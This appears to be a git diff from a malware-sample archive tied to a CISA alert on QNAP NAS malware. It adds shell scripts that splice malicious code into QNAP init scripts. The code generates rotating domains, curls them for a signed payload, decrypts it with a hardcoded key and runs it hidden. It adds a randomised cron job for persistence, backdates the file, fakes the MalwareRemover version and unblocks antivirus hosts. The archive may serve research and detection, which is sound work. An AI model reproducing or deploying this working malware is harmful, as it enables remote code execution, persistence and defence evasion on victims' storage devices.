/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJog4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.config" || mkdir "${bdir}/.qpkg/.config"
|
||||
cd "${bdir}/.qpkg/.config" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
XEOF
|
||||
fi
|
||||
chmod 755 "${bdir}/.qpkg/.config/backup_conf.sh"
|
||||
touch -cr /bin/busybox "${bdir}/.qpkg/.config/backup_conf.sh"
|
||||
|
||||
if ! $fgrep "${bdir}/.qpkg/.config/backup_conf.sh" "${confdir}"/crontab; then
|
||||
cronmins=$(printf '%i' "$(( $RANDOM % 60 ))")
|
||||
cronhour=$(printf '%i' "$(( $RANDOM % 24 ))")
|
||||
cronhour=$(printf '%i,' "$(( ( $cronhour + 8 ) % 24 ))" "$(( ( $cronhour + 16 ) % 24 ))")"$cronhour"
|
||||
echo "$cronmins $cronhour"' * * * '"${bdir}/.qpkg/.config/backup_conf.sh"' >/dev/null 2>/dev/null' >> "${confdir}"/crontab
|
||||
fi
|
||||
test ! -x "${bdir}/.qpkg/.config/backup_conf.sh" && chmod 755 "${bdir}/.qpkg/.config/backup_conf.sh"
|
||||
( ( exec >/dev/null 2>&1 </dev/null; "${bdir}/.qpkg/.config/backup_conf.sh" </dev/null >/dev/null 2>/dev/null & ) & )
|
||||
exit 0
|
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/18a4f2e7847a2c4e3c9a949cc610044bde319184ef1f4d23a8053e5087ab641b
Normal file
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/18a4f2e7847a2c4e3c9a949cc610044bde319184ef1f4d23a8053e5087ab641b
Normal file
Binary file not shown.
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3615f0019e9a64a78ccb57faa99380db0b36146ec62df768361bca2d9a5c27f2
Normal file
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3615f0019e9a64a78ccb57faa99380db0b36146ec62df768361bca2d9a5c27f2
Normal file
Binary file not shown.
936
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3c38e7bb004b000bd90ad94446437096f46140292a138bfc9f7e44dc136bac8d
Normal file
936
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3c38e7bb004b000bd90ad94446437096f46140292a138bfc9f7e44dc136bac8d
Normal file
@ -0,0 +1,936 @@
|
||||
#!/bin/sh
|
||||
ts=1553058000
|
||||
PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
|
||||
test -d "$bdir" && break; bdir=''
|
||||
done <<EOF
|
||||
$(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
|
||||
EOF
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
|
||||
|
||||
getcfg MalwareRemover Version -f /etc/config/qpkg.conf && setcfg MalwareRemover Version 3.4.1 -f /etc/config/qpkg.conf
|
||||
getcfg MalwareRemover Date -f /etc/config/qpkg.conf && setcfg MalwareRemover Date 2019-01-25 -f /etc/config/qpkg.conf
|
||||
getcfg MalwareRemover Build -f /etc/config/qpkg.conf && setcfg MalwareRemover Build 20190125 -f /etc/config/qpkg.conf
|
||||
|
||||
if grep "clamav\.net" /etc/hosts; then
|
||||
sed -i '/0.0.0.0 .*clamav\.net/d' /etc/hosts
|
||||
fi
|
||||
|
||||
if grep '0\.0\.0\.0 update\.nai\.com' /etc/hosts; then
|
||||
sed -i '/0\.0\.0\.0 update\.nai\.com/d' /etc/hosts
|
||||
fi
|
||||
|
||||
test -z "$PWD" && PWD=$(pwd)
|
||||
CWD="$PWD"
|
||||
if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
|
||||
CWD=''
|
||||
for dir in '.config' '.liveupdate'; do
|
||||
dir="${bdir}/.qpkg/${dir}"
|
||||
test -d "$dir" && cd "$dir" && CWD="$dir" && break
|
||||
done
|
||||
fi
|
||||
test "$CWD" && test -d "$CWD" && cd "$CWD"
|
||||
|
||||
sedreplace () {
|
||||
local grepstring="$1" sedcmd="$2" file="$3"
|
||||
[ "$grepstring" ] && [ "$sedcmd" ] && [ "$file" ] || return 1
|
||||
if grep "$grepstring" "$file"; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
sed -i "$sedcmd" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
return $?
